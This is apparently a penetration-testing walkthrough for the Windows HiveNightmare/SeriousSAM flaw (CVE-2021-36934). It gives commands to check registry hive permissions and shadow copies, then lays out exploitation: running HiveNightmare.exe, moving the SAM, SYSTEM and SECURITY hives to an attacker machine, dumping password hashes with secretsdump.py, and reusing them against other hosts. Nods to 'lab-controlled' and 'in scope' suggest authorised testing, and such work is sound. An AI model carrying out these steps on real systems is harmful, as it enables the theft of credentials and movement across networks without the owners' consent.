This PoC can be used to perform the attack. This script can be used to detect the flaw.
CVE-2021-36934, also known as HiveNightmare or SeriousSAM, is caused by overly permissive ACLs on sensitive Windows registry hive files.
If vulnerable, low-privileged users may be able to read files such as:
SAMSYSTEMSECURITY
These hives can be copied and processed offline to recover local password hashes.
This is not a direct shell by itself. The value comes from extracting credential material and reusing it where possible.
Enumeration
Check permissions:
icacls C:\Windows\System32\config\SAM
icacls C:\Windows\System32\config\SYSTEM
icacls C:\Windows\System32\config\SECURITY
Check for shadow copies:
vssadmin list shadows
Interesting findings include:
BUILTIN\Usershaving read access to sensitive hives- Existing shadow copies
- Readable registry hive backups
- Local administrator hashes recoverable from copied hives
Exploit
- Confirm vulnerable hive permissions
- Copy the sensitive hives using an appropriate lab-controlled method
- Transfer the copied hives to the attacker machine
- Extract hashes offline
- Attempt local authentication or password reuse where in scope
Run the PoC on the target:
.\HiveNightmare.exe
Confirm that the hives were copied:
dir
Process the hives offline:
secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL
If local administrator hashes are recovered, test whether they can be reused against the same host or other systems.